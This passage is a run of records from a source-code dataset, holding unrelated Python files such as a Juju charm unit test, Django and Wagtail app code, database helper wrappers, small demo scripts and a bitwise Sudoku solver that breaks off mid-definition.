no_cache\n\n","sub_path":"Codes/Chapter_12_Performance/03_calibration.py","file_name":"03_calibration.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"223772512","text":"import mock\nimport unittest\nimport trilio_data_mover as datamover\n\n_when_args = {}\n_when_not_args = {}\n\n\ndef mock_hook_factory(d):\n\n def mock_hook(*args, **kwargs):\n\n def inner(f):\n # remember what we were passed. 
Note that we can't actually\n # determine the class we're attached to, as the decorator only gets\n # the function.\n try:\n d[f.__name__].append(dict(args=args, kwargs=kwargs))\n except KeyError:\n d[f.__name__] = [dict(args=args, kwargs=kwargs)]\n return f\n return inner\n return mock_hook\n\n\nclass Test(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls._patched_when = mock.patch('charms.reactive.when',\n mock_hook_factory(_when_args))\n cls._patched_when_started = cls._patched_when.start()\n cls._patched_when_not = mock.patch('charms.reactive.when_not',\n mock_hook_factory(_when_not_args))\n cls._patched_when_not_started = cls._patched_when_not.start()\n # force requires to rerun the mock_hook decorator:\n # try except is Python2/Python3 compatibility as Python3 has moved\n # reload to importlib.\n try:\n reload(datamover)\n except NameError:\n import importlib\n importlib.reload(datamover)\n\n @classmethod\n def tearDownClass(cls):\n cls._patched_when.stop()\n cls._patched_when_started = None\n cls._patched_when = None\n cls._patched_when_not.stop()\n cls._patched_when_not_started = None\n cls._patched_when_not = None\n # and fix any breakage we did to the module\n try:\n reload(datamover)\n except NameError:\n import importlib\n importlib.reload(datamover)\n\n def setUp(self):\n self._patches = {}\n self._patches_start = {}\n\n def tearDown(self):\n for k, v in self._patches.items():\n v.stop()\n setattr(self, k, None)\n self._patches = None\n self._patches_start = None\n\n def patch(self, obj, attr, return_value=None, side_effect=None):\n mocked = mock.patch.object(obj, attr)\n self._patches[attr] = mocked\n started = mocked.start()\n started.return_value = return_value\n started.side_effect = side_effect\n self._patches_start[attr] = started\n setattr(self, attr, started)\n\n def test_registered_hooks(self):\n # test that the hooks actually registered the relation expressions that\n # are meaningful for this interface: this is to handle regressions.\n # The keys are the function names that the hook attaches to.\n when_patterns = {\n 'stop_tvault_contego_plugin': ('tvault-contego.stopping', ),\n }\n when_not_patterns = {\n 'install_tvault_contego_plugin': (\n 'tvault-contego.installed', ), }\n # check the when hooks are attached to the expected functions\n for t, p in [(_when_args, when_patterns),\n (_when_not_args, when_not_patterns)]:\n for f, args in t.items():\n # check that function is in patterns\n self.assertTrue(f in p.keys(),\n \"{} not found\".format(f))\n # check that the lists are equal\n lists = []\n for a in args:\n lists += a['args'][:]\n self.assertEqual(sorted(lists), sorted(p[f]),\n \"{}: incorrect state registration\".format(f))\n\n def test_install_plugin(self):\n self.patch(datamover, 'install_plugin')\n datamover.install_plugin('pkg_name')\n self.install_plugin.assert_called_once_with('pkg_name')\n\n def test_uninstall_plugin(self):\n self.patch(datamover, 'uninstall_plugin')\n datamover.uninstall_plugin()\n self.uninstall_plugin.assert_called_once_with()\n\n def test_install_tvault_contego_plugin(self):\n self.patch(datamover, 'install_tvault_contego_plugin')\n datamover.install_tvault_contego_plugin()\n self.install_tvault_contego_plugin.assert_called_once_with()\n\n def test_stop_tvault_contego_plugin(self):\n self.patch(datamover, 'config')\n self.patch(datamover, 'status_set')\n self.patch(datamover, 'remove_state')\n self.patch(datamover, 'uninstall_plugin')\n self.uninstall_plugin.return_value = True\n 
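# uninstall_plugin is patched to report success above, so the handler is expected to run to completion (see the asserts below).\n 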
datamover.stop_tvault_contego_plugin()\n self.status_set.assert_called_with(\n 'maintenance', 'Stopping...')\n self.remove_state.assert_called_with('tvault-contego.stopping')\n\n def test_s3_object_storage_fail(self):\n self.patch(datamover, 'config')\n self.config.return_value = 's3'\n self.patch(datamover, 'apt_update')\n self.patch(datamover, 'status_set')\n self.patch(datamover, 'validate_backup')\n self.validate_backup.return_value = True\n self.patch(datamover, 'add_users')\n self.add_users.return_value = True\n self.patch(datamover, 'create_virt_env')\n self.create_virt_env.return_value = True\n self.patch(datamover, 'ensure_files')\n self.ensure_files.return_value = True\n self.patch(datamover, 'create_conf')\n self.create_conf.return_value = True\n self.patch(datamover, 'ensure_data_dir')\n self.ensure_data_dir.return_value = True\n self.patch(datamover, 'create_service_file')\n self.create_service_file.return_value = True\n self.patch(datamover, 'create_object_storage_service')\n self.create_object_storage_service.return_value = False\n self.patch(datamover.os, 'system')\n self.patch(datamover, 'log')\n datamover.install_tvault_contego_plugin()\n self.status_set.assert_called_with(\n 'blocked',\n 'Failed while creating ObjectStore service file')\n\n def test_s3_object_storage_pass(self):\n self.patch(datamover, 'config')\n self.patch(datamover, 'apt_update')\n self.patch(datamover, 'status_set')\n self.patch(datamover, 'validate_backup')\n self.validate_backup.return_value = True\n self.patch(datamover, 'add_users')\n self.add_users.return_value = True\n self.patch(datamover, 'create_virt_env')\n self.create_virt_env.return_value = True\n self.patch(datamover, 'ensure_files')\n self.ensure_files.return_value = True\n self.patch(datamover, 'create_conf')\n self.create_conf.return_value = True\n self.patch(datamover, 'ensure_data_dir')\n self.ensure_data_dir.return_value = True\n self.patch(datamover, 'create_service_file')\n self.create_service_file.return_value = True\n self.patch(datamover, 'create_object_storage_service')\n self.create_object_storage_service.return_value = True\n self.patch(datamover, 'service_restart')\n self.patch(datamover, 'set_flag')\n self.patch(datamover, 'application_version_set')\n self.patch(datamover, 'get_new_version')\n self.patch(datamover.os, 'system')\n datamover.install_tvault_contego_plugin()\n self.service_restart.assert_called_with(\n 'tvault-contego')\n self.status_set.assert_called_with(\n 'active', 'Ready...')\n self.application_version_set.assert_called_once()\n self.set_flag.assert_called_with(\n 'tvault-contego.installed')\n","sub_path":"juju-charms/charm-trilio-data-mover/unit_tests/test_data_mover.py","file_name":"test_data_mover.py","file_ext":"py","file_size_in_byte":7640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"162189489","text":"import time\nfrom threading import Thread\n\ndef myfun():\n\ttime.sleep(1)\n\ta = 1 + 1\n\tprint(a)\n\nt1 = time.time()\nfor i in range(5):\n\tmyfun()\n\nt2 = time.time()\nprint(t2-t1)\n\nths = []\nfor _ in range(5):\n\tth = Thread(target=myfun)\n\tth.start()\n\tths.append(th)\n\nfor th in ths:\n\tth.join()\n\nt3 = time.time()\nprint(t3-t2)","sub_path":"Repo_Python/zhihu_interest/multithread/multithr01.py","file_name":"multithr01.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"222391107","text":"from annoy import AnnoyIndex\nimport 
random\nimport numpy as np\n\n\ndef annoyTest():\n    f = 40\n\n    t = AnnoyIndex(f,'angular')\n    for i in range(1000):\n        v = [random.gauss(0,1) for z in range(f)]\n        t.add_item(i,v) # add a 40-dimensional vector\n    t.build(10)\n    t.save('test.ann')\n\n    u = AnnoyIndex(f,'angular')\n    u.load('test.ann',True)\n    nns = u.get_nns_by_item(100,10) # get the 10 nearest vectors to index 100\n    print(nns)\n    print(u.get_distance(100,nns[0]))\n\ndef faissTest():\n    d = 64\n    nb = 100\n    nq = 10\n    np.random.seed(1234)\n    xb = np.random.random((nb,d)).astype('float32')\n\n    print(xb[:2])\n    print(xb.shape)\n    print(xb[0:2])\n\nif __name__ == \"__main__\":\n    faissTest()\n","sub_path":"basePython/25_ann_search.py","file_name":"25_ann_search.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"588789571","text":"from django.urls import path\n\nfrom wedding_list.views import (\n    WeddingListCAPIView,\n    WeddingListRUDAPIView,\n    ProductAPIView,\n    UserAPIView,\n    UserDetailView,\n    ProductRUDAPIView,\n)\n\nurlpatterns = [\n    path(\"users/\", UserAPIView.as_view(), name=\"user_list\"),\n    path(\"users/<int:pk>/\", UserDetailView.as_view(), name=\"user_detail\"),\n    path(\"products/\", ProductAPIView.as_view(), name=\"product_list\"),\n    path(\"product/<int:pk>/\", ProductRUDAPIView.as_view(), name=\"product_detail\"),\n    path(\"list/\", WeddingListCAPIView.as_view(), name=\"wedding_list\"),\n    path(\"listitem/<int:pk>/\", WeddingListRUDAPIView.as_view(), name=\"wedding_item\"),\n]\n","sub_path":"weddingshop/wedding_list/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"324305358","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import fetch_20newsgroups\n\ncategories = ['comp.graphics','comp.os.ms-windows.misc', 'comp.sys.ibm.pc.hardware', 'comp.sys.mac.hardware', 'rec.autos', 'rec.motorcycles', 'rec.sport.baseball', 'rec.sport.hockey']\n\ntwenty_train = fetch_20newsgroups(subset='train', categories=categories, shuffle=True, random_state=42)\ntwenty_test = fetch_20newsgroups(subset='test', categories=categories, shuffle=True, random_state=42)\n\n#----------------------------------Generating Histogram of Number of Documents per Class for the 8 Classes--------------------------------------------\nindex = np.arange(8)\nvalues = []\nfor i in range(len(twenty_train.target_names)):\n    values.append((twenty_train.target == i).sum())\n\n\nbar_width = 0.75\ncolor = ['b', 'g', 'r', 'c', 'pink', 'm', 'y', 'k']\nbars = plt.barh(index, values, bar_width,alpha = 0.8, color = color, align=\"edge\")\nplt.xlabel('Number of Documents', fontweight=\"bold\", )\nplt.ylabel('Classes', fontweight=\"bold\")\nplt.title('Number of Training Documents Per Class', fontweight=\"bold\")\nplt.yticks(index + bar_width/2, ('comp.graphics', 'comp.os.ms-windows.misc', 'comp.sys.ibm.pc.hardware', 'comp.sys.mac.hardware', 'rec.autos', 'rec.motorcycles', 'rec.sport.baseball', 'rec.sport.hockey'))\nplt.show()\n\n#---------------------------------------------------------------------------------------------------------------------------------------------------","sub_path":"project 1/myProject_1/project_1_PartA.py","file_name":"project_1_PartA.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"63246705","text":"from django.db import models\nfrom datetime 
import datetime\nfrom django.contrib.auth.models import User\n\nfrom django.db.models.fields import DateTimeField\n\nclass Receita(models.Model):\n    pessoa=models.ForeignKey(User, on_delete=models.CASCADE)\n    nome_receita=models.CharField(max_length=200)\n    ingredientes=models.TextField(default='')\n    modo_preparo= models.TextField(default='')\n    tempo_preparo=models.IntegerField(default=0)\n    rendimento=models.CharField(max_length=100)\n    categoria=models.CharField(max_length=100)\n    date_receita=models.DateTimeField(default=datetime.now, blank=True)\n    foto_receita=models.ImageField(upload_to='fotos/%d/%m/%Y',blank=True, null=True, default='0')\n    publicada=models.BooleanField(default=False)\n    def __str__(self):\n        return self.nome_receita\n\n","sub_path":"AlexReceitas/apps/Receitas/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"277243862","text":"n = int(input())\n\nif n <= 2:\n    print('Deficient')\n    exit()\n\ndiv_sum = 0\nfor i in range(1, int(n**0.5)+1):\n    if i*i > n: break\n    if n%i == 0:\n        div_sum += i\n        if i*i != n and i != 1:\n            div_sum += n//i\n\nif div_sum < n:\n    print('Deficient')\nelif div_sum == n:\n    print('Perfect')\nelse:\n    print('Abundant')","sub_path":"2_kakomon/arc/arc026_b.py","file_name":"arc026_b.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"457409390","text":"# -*- coding:utf-8 -*-\n__author__ = 'snake'\n\nimport datetime\nimport pymysql.cursors\nfrom config import DBConfig\n\n\ndef query(sql=\"\"):\n    \"\"\"\n    Query the database with the given sql\n    args: sql\n    return: results, a list of row dicts such as [{'articleId': 2, 'status': 1, 'createDate': '2018-03-30 11:22:50', 'userId': -1, 'id': 4, 'updateDate': None}]\n    \"\"\"\n    results = []\n    db = pymysql.connect(**DBConfig)\n    cur = db.cursor()\n    try:\n        cur.execute(sql)  # execute the sql statement\n        # get the column names\n        descs = []\n        for desc in cur.description:\n            descs.append(desc[0])\n\n        # build key-value pairs {\"column name\": value}\n        results = []\n        for res in _decode_result_date(cur.fetchall()):\n            row = {}\n            for i in range(len(descs)):\n                row[descs[i]] = res[i]\n            results.append(row)\n    except Exception as e:\n        raise e\n    finally:\n        cur.close()\n        db.close()  # close the connection\n    return results\n\n\ndef excute(sql=\"\"):\n    \"\"\"\n    Insert or update data with the given sql\n    args: sql\n    return: is_success, True on success, False on failure\n    \"\"\"\n    is_success = True\n    db = pymysql.connect(**DBConfig)\n    cur = db.cursor()\n    try:\n        cur.execute(sql)\n        db.commit()\n    except Exception as e:\n        db.rollback()\n        is_success = False\n    finally:\n        cur.close()\n        db.close()\n    return is_success\n\n\ndef excutemany(sqls=[]):\n    \"\"\"\n    Execute several insert or update statements; use this when they should be committed together\n    args: [sql1, sql2,...]\n    return: is_success, True on success, False on failure\n    \"\"\"\n    is_success = True\n    db = pymysql.connect(**DBConfig)\n    cur = db.cursor()\n    try:\n        for sql in sqls:\n            cur.execute(sql)\n        db.commit()\n    except Exception as e:\n        db.rollback()\n        is_success = False\n    finally:\n        cur.close()\n        db.close()\n    return is_success\n\n\ndef _decode_result_date(datas):\n    \"\"\"\n    Format the datetime values in rows fetched from the database\n    :param datas: (()), the rows fetched from the database\n    :return: [[]] a list of lists\n    \"\"\"\n    results = []\n    for data in datas:\n        tmp_list = []\n        for item in data:\n            if isinstance(item, datetime.datetime):\n                tmp_list.append(item.strftime('%Y-%m-%d %H:%M:%S'))\n            else:\n                tmp_list.append(item)\n        results.append(tmp_list)\n\n    return results\n\n\nif __name__ == \"__main__\":\n    data = query(\"select * from tbl_user where username='1' and password='1'\")\n    print(data)\n\n    # Test a single insert\n    # name = \"test4\"\n    # sql = \"insert into tbl_test values(NULL,'%s')\" % name\n    # flag = excute(sql)\n    # print(flag)\n    #\n    # Test a single update\n    # name = \"update test\"\n    # sql = \"update tbl_test set name='%s' where id=2\" % name\n    # flag = excute(sql)\n    # print(flag)\n\n    # Test multiple updates\n    # name = \"update test\"\n    # sql1 =\"update tbl_test set name='%s' where id=2\" % name\n    # sql2 =\"update tbl_test set name='%s' where id=3\" % name\n    # print(excutemany([sql1, sql2]))\n\n    # Test multiple inserts\n    # name = \"insert test\"\n    # sql1 = \"insert into tbl_test values(NULL,'%s')\" % name\n    # sql2 = \"insert into tbl_test values(NULL,'%s')\" % name\n    # print(excutemany([sql1, sql2]))\n","sub_path":"app/utils/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"283632965","text":"from django.shortcuts import render\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\nimport json\nfrom models import User\nfrom django.http import HttpResponse\nfrom django.forms.models import model_to_dict\nfrom django.views.decorators.csrf import csrf_exempt\nfrom serializers import UserSerializer\n# Create your views here.\n@csrf_exempt\n@api_view(['GET', 'POST', 'PUT'])\ndef user_list(request):\n    if request.method =='GET':\n        users = User.objects.all()\n        serializer=UserSerializer(users, many=True)\n        content = JSONRenderer().render(serializer.data)\n        return HttpResponse(json.dumps(content), content_type='application/json')\n    elif request.method =='POST':\n        serializer = UserSerializer(data=request.data)\n        if serializer.is_valid():\n            serializer.validated_data\n            serializer.save()\n            content = JSONRenderer().render(serializer.data)\n            return HttpResponse(json.dumps(content), content_type='application/json')\n        return HttpResponse(serializer.errors)\n\n\n@api_view(['GET', 'PUT', 'DELETE'])\ndef user_changes(request, cwid):\n    try:\n        user = User.objects.get(cwid=cwid)\n    except User.DoesNotExist:\n        return Response(status=status.HTTP_404_NOT_FOUND)\n    if request.method =='GET':\n        serializer = UserSerializer(user)\n        content = JSONRenderer().render(serializer.data)\n        return HttpResponse(json.dumps(content), content_type='application/json')\n    elif request.method =='PUT':\n        serializer = UserSerializer(user, data=request.data)\n        if serializer.is_valid():\n            serializer.save()\n            content = JSONRenderer().render(serializer.data)\n            return HttpResponse(json.dumps(content), content_type='application/json')\n        return HttpResponse(serializer.errors)\n    \n    ","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"115132851","text":"from django.urls import path\nfrom FB_CRUD import views\n\nurlpatterns = [\n    path('', views.add_show, name='addandshow'),\n\n    # For deleting the data. This one is known as a dynamic URL.\n    path('delete/<int:id>/', views.delete, name = 'delete'),\n\n    path('<int:id>/', views.edit, name = 'edit')\n\n    \n]","sub_path":"04.FunctionBased_CRUD/FunctionBased_CRUD/FB_CRUD/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"585244817","text":"#edited:180519\n#coding:utf-8\n\nimport pymongo\n\nclass 
mongodb(object):\n\t\"\"\"usual handle of mongodb\"\"\"\n\tdef __init__(self,uri='mongodb://localhost:27017/test',dbname='test'):\n\t\tself.uri = uri  # keep the uri; __connect() needs it to open extra connections\n\t\tself.conn = pymongo.MongoClient(uri)\n\t\tself.db = self.conn[dbname]\n\t\n\tdef __connect(self,dbname,collection):\n\t\ttry:\n\t\t\tconn = pymongo.MongoClient(self.uri)\n\t\t\tdb = conn[dbname]\n\t\t\tcol = db[collection]\n\t\texcept Exception as e:\n\t\t\traise e\n\t\treturn col\n\n\t#@staticmethod\n\tdef find_many(self,filter,projection=None):\n\t\tcol = self.__connect('test','test')\n\t\tresult = [x for x in col.find(filter,projection)]\n\t\tprint(dir(result))\n\t\tprint('Query returned: {}\\n'.format(result))\n\t\treturn result\n\n\tdef insert_one(self, collection, doc):\n\t\ttry:\n\t\t\tcol = self.db[collection]\n\t\t\tresult = col.insert_one(doc)\n\t\t\tprint('Insert succeeded: {0}\\nGenerated id: {1}\\n'.format(result.acknowledged,result.inserted_id))\n\t\texcept Exception as e:\n\t\t\traise e\n\t\treturn result\n\n\tdef insert_many(self,docs,filter):\n\t\ttry:\n\t\t\tcol = self.__connect('test','test')\n\t\t\tresult = col.insert_many(docs)\n\t\t\tprint('Insert succeeded: {0}\\nGenerated ids: {1}\\n'.format(result.acknowledged,result.inserted_ids))\n\t\texcept Exception as e:\n\t\t\traise e\t\n\t\treturn result\n\n\tdef del_many(self,filter,query):\n\t\ttry:\n\t\t\tcol = self.__connect('test','test')\n\t\t\tresult = col.delete_many(filter)\n\t\t\tprint('Delete succeeded: {0}\\nDeleted count: {1}\\n'.format(result.acknowledged,result.deleted_count))\n\t\texcept Exception as e:\n\t\t\traise e\n\n\tdef drop_col(self,collection):\n\t\t\"\"\"Drop the given collection\"\"\"\n\t\tcol = self.db[collection]\n\t\tcol.drop()\n\n\tdef close(self):\n\t\treturn self.conn.close()\n\nif __name__ == '__main__':\n\tm = mongodb()\n\tdoc = {'name':'小米','phone':'13800001000','sex':'male','age':17}\n\tdocs = [{'name':'小黑','phone':'13800001001','sex':'male','age':18},{'name':'小陈','phone':'13800001002','sex':'female','age':15},\n\t\t\t{'name':'小刘','phone':'13800001002','sex':'female','age':14},{'name':'小王','phone':'13800001002','sex':'male','age':16}]\n\tm.insert_one('test',doc)\n\t#m.insert_many(docs,{'name':'小黑'})\n\t#m.find_many(filter={},projection={'_id':False})\n\t#m.del_many({'sex':'male'},{'sex':'female'})\n\t# drop the test collection\n\tm.drop_col('test')\n\tm.close()","sub_path":"Mongo/handle.py","file_name":"handle.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"161454216","text":"import datetime\n\nfrom django.db import models\nfrom django import forms\n\nfrom wagtail.images.edit_handlers import ImageChooserPanel\nfrom wagtail.core.models import Page\nfrom wagtail.core.fields import RichTextField, StreamField\nfrom wagtail.core import blocks\nfrom wagtail.admin.edit_handlers import FieldPanel, MultiFieldPanel, InlinePanel, StreamFieldPanel, FieldRowPanel\nfrom wagtail.snippets.models import register_snippet\nfrom wagtail.search import index\nfrom wagtail.images.blocks import ImageChooserBlock\nfrom modelcluster.fields import ParentalKey, ParentalManyToManyField\nfrom taggit.models import TaggedItemBase\nfrom modelcluster.contrib.taggit import ClusterTaggableManager\nfrom django.core.validators import MaxValueValidator, MinValueValidator\n\n# Create your models here.\n\n\n@register_snippet\nclass AnimeStudio(models.Model):\n    name = models.CharField(max_length=255)\n    slug = models.CharField(max_length=255,null=True, blank=True)\n    image = models.ForeignKey(\n        'wagtailimages.Image', null=True, blank=True,\n        
on_delete=models.SET_NULL, related_name='+'\n    )\n\n    panels = [\n        FieldPanel('name'),\n        FieldPanel('slug'),\n        ImageChooserPanel('image'),\n    ]\n\n    def __str__(self):\n        return self.name\n\n    class Meta:\n        verbose_name_plural = 'Studios'\n\n\nclass AnimePageTag(TaggedItemBase):\n    content_object = ParentalKey(\n        'AnimePage',\n        related_name='tagged_items',\n        null=True, blank=True,\n        on_delete=models.SET_NULL\n    )\n\n    def __str__(self):\n        return self.name\n\n\n\nclass AnimeIndexPage(Page):\n    intro = models.CharField(max_length=300)\n    layout = models.CharField(max_length=300, default=\"grid-4-cols\")\n    featured_image = models.ForeignKey(\n        'wagtailimages.Image',\n        null=True,\n        blank=True,\n        on_delete=models.SET_NULL,\n        related_name='+'\n    )\n    content_panels = Page.content_panels + [\n        FieldPanel('intro'),\n        FieldPanel('layout'),\n        ImageChooserPanel('featured_image')\n    ]\n\nclass AnimePage(Page):\n\n    # Database fields\n    intro = models.CharField(max_length=450, null=True, blank=True)\n    body = StreamField(\n        [\n            ('heading', blocks.CharBlock(classname=\"full title\")),\n            ('paragraph', blocks.RichTextBlock()),\n            ('image', ImageChooserBlock())\n        ],\n        default=\"\"\n    )\n    \n    studio = models.ForeignKey('anime.AnimeStudio',\n        null=True,\n        blank=True,\n        on_delete=models.SET_NULL,\n        related_name='studio')\n    \n    format = models.CharField(\n        max_length=20,\n        choices=[\n            ('tv-series', 'TV Series'),\n            ('ova', 'OVA'),\n            ('movie', 'MOVIE'),\n        ],\n        default='tv-series',\n    )\n\n    season = models.CharField(\n        max_length=6,\n        choices=[\n            ('spring', 'Spring'),\n            ('summer', 'Summer'),\n            ('autumn', 'Autumn'),\n            ('winter', 'Winter'),\n        ],\n        default='spring',\n    )\n    now = datetime.datetime.now()\n    year = models.IntegerField(validators=[MinValueValidator(1950),MaxValueValidator(2050)], default = now.year)\n    tags = ClusterTaggableManager(through=AnimePageTag, blank=True)\n    # categories = ParentalManyToManyField('project.ProjectPageCategory', blank=True)\n    featured_image = models.ForeignKey(\n        'wagtailimages.Image',\n        null=True,\n        blank=True,\n        on_delete=models.SET_NULL,\n        related_name='+'\n    )\n\n    # Editor panels configuration\n\n    content_panels = Page.content_panels + [\n        FieldPanel('intro'),\n        StreamFieldPanel('body'),\n        MultiFieldPanel([\n            FieldPanel('tags'),\n            # FieldPanel('categories', widget=forms.CheckboxSelectMultiple),\n        ], heading=\"Meta Info\"),\n        FieldRowPanel([\n            FieldPanel('studio', classname=\"col3\"),\n            FieldPanel('format', classname=\"col3\"),\n            FieldPanel('season', classname=\"col3\"),\n            FieldPanel('year', classname=\"col3\"),\n        ]),\n        ImageChooserPanel('featured_image'),\n\n    ]\n    # Parent page / subpage type rules\n\n    parent_page_types = ['anime.AnimeIndexPage']","sub_path":"anime/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"179200767","text":"#!/usr/bin/env python2\nfrom __future__ import print_function\nimport sys\nimport copy\nimport timeit\n\n\nclass SudokuSolver:\n    def __init__(self, board=None):\n        if board:\n            self.board = copy.deepcopy(board)\n        else:\n            self.board = [[\".\"] * 9 for _ in range(9)]\n        self.result = []\n        self._in_row, self._in_col, self._in_block = None, None, None\n        self._BLANK = None\n        self._ONES = None\n        self._entry = None\n        self._row, self._col, self._block = None, None, None\n        self._seq_ptr = None\n        self._sequence = None\n        self._count = None\n        self._level_count = None\n        self._row_vals, self._col_vals, self._block_vals = None, None, None\n        self._vals = 
None\n\n    def init_sudoku2(self):\n        self._in_row = [square / 9 for square in range(81)]\n        self._in_col = [square % 9 for square in range(81)]\n        self._in_block = [square / 27 * 3 + square % 9 / 3 for square in range(81)]\n        self._BLANK = 0\n        self._ONES = 0x3fe  # binary 1111111110\n        self._entry = [self._BLANK] * 81  # records entries 1-9 in the grid, as the corresponding bit set to 1\n        self._row, self._col, self._block = [self._ONES] * 9, [self._ONES] * 9, [\n            self._ONES] * 9  # each int is a 9-bit array\n        self._seq_ptr = 0\n        self._sequence = [square for square in range(81)]\n        self._count = 0\n        self._level_count = [0] * 81\n\n    def init_entry(self, row, col, val):\n        square = 9 * row + col\n        valbit = 1 << val\n        # add suitable checks for data consistency\n        self._entry[square] = valbit\n        self._row[self._in_row[square]] &= ~ valbit  # simpler self._row[row] &= ~ valbit;\n        self._col[self._in_col[square]] &= ~ valbit  # simpler self._col[col] &= ~ valbit;\n        self._block[self._in_block[square]] &= ~ valbit\n        seq_ptr2 = self._seq_ptr\n        while seq_ptr2 < 81 and self._sequence[seq_ptr2] != square:\n            seq_ptr2 += 1\n        self._sequence[self._seq_ptr], self._sequence[seq_ptr2] = self._sequence[seq_ptr2], self._sequence[self._seq_ptr]\n        self._seq_ptr += 1\n\n    def print_array(self):\n        square = 0\n        for row in range(9):\n            if row % 3 == 0:\n                sys.stdout.write(\"\\n\")\n            for col in range(9):\n                if col % 3 == 0:\n                    sys.stdout.write(\" \")\n                valbit = self._entry[square]\n                square += 1\n                if valbit != 0:\n                    for val in range(1, 10):\n                        if valbit == 1 << val:\n                            ch = str(val)\n                            break\n                else:\n                    ch = \".\"\n                sys.stdout.write(ch)\n            sys.stdout.write(\"\\n\")\n\n    def console_input_one(self):\n        for row in range(9):\n            for col in range(9):\n                sys.stdout.write(\"Row[{:d}]Col[{:d}]:\".format(row + 1, col + 1))\n                input_string = raw_input()\n                while len(input_string) != 1:\n                    sys.stdout.write(\"Row[{:d}]Col[{:d}]:\".format(row + 1, col + 1))\n                    input_string = raw_input()\n                ch = input_string\n                if ch.isdigit():  # 48 < ord(ch) < 58\n                    self.init_entry(row, col, int(ch))\n        self.print_array()\n\n    def console_input_row(self):\n        for row in range(9):\n            sys.stdout.write(\"Row[%d]:\" % (row + 1))\n            input_string = raw_input()\n            while len(input_string) != 9:\n                sys.stdout.write(\"Row[%d]:\" % (row + 1))\n                input_string = raw_input()\n            for col in range(9):\n                ch = input_string[col]\n                if ch.isdigit():\n                    self.init_entry(row, col, int(ch))\n        self.print_array()\n\n    def _print_stats(self):\n        sys.stdout.write(\"\\nLevel Counts:\\n\")\n        square = 0\n        while self._level_count[square] == 0:\n            square += 1\n        level = 0\n        while square < 81:\n            seq = self._sequence[square]\n            sys.stdout.write(\"({},{}):{} \".format(seq / 9 + 1, seq % 9 + 1, self._level_count[square]))\n            level += 1\n            if level % 5 == 0:\n                sys.stdout.write(\"\\n\")\n            square += 1\n        if level % 5 != 0:\n            sys.stdout.write(\"\\n\")\n        sys.stdout.write(\"\\nCount = %d\\n\" % self._count)\n\n    def _next_seq(self, seq_ptr):\n        min_bit_count = 100\n        for ptr in range(seq_ptr, 81):\n            square = self._sequence[ptr]\n            possibles = self._block[self._in_block[square]] & self._row[self._in_row[square]] & self._col[self._in_col[square]]\n            bit_count = 0\n            while possibles:\n                possibles &= ~ (possibles & - possibles)\n                bit_count += 1\n            if bit_count < min_bit_count:\n                min_bit_count = bit_count\n                seq_ptr2 = ptr\n        return seq_ptr2\n\n    def _place(self, seq_ptr):\n        if seq_ptr >= 81:\n            self.print_array()\n            self._print_stats()\n            self.entry_to_board()\n            self.result.append(copy.deepcopy(self.board))\n            return\n        self._level_count[seq_ptr] += 1\n        self._count 
+= 1\n seq_ptr2 = self._next_seq(seq_ptr)\n self._sequence[seq_ptr], self._sequence[seq_ptr2] = self._sequence[seq_ptr2], self._sequence[seq_ptr]\n square = self._sequence[seq_ptr]\n row_index = self._in_row[square]\n col_index = self._in_col[square]\n block_index = self._in_block[square]\n possibles = self._block[block_index] & self._row[row_index] & self._col[col_index]\n while possibles:\n valbit = possibles & - possibles # lowest 1 bit in possibles\n possibles &= ~ valbit\n self._entry[square] = valbit\n self._row[row_index] &= ~ valbit\n self._col[col_index] &= ~ valbit\n self._block[block_index] &= ~ valbit\n self._place(seq_ptr + 1)\n self._entry[square] = self._BLANK # could be moved out of the loop\n self._row[row_index] |= valbit\n self._col[col_index] |= valbit\n self._block[block_index] |= valbit\n self._sequence[seq_ptr], self._sequence[seq_ptr2] = self._sequence[seq_ptr2], self._sequence[seq_ptr]\n\n def sudoku2(self, console=True):\n if console:\n self.init_sudoku2()\n self.console_input_row()\n self.entry_to_board()\n temp = copy.deepcopy(self.board)\n self._place(self._seq_ptr)\n sys.stdout.write(\"\\nTotal Count = %d\\n\" % self._count)\n self.board = temp\n\n def entry_to_board(self):\n for square in range(81):\n valbit = self._entry[square]\n if valbit != 0:\n for val in range(1, 10):\n if valbit == 1 << val:\n self.board[square / 9][square % 9] = str(val)\n else:\n self.board[square / 9][square % 9] = \".\"\n\n def board_to_entry(self):\n self.init_sudoku2()\n for row in range(9):\n for col in range(9):\n if self.board[row][col].isdigit():\n self.init_entry(row, col, int(self.board[row][col]))\n\n def 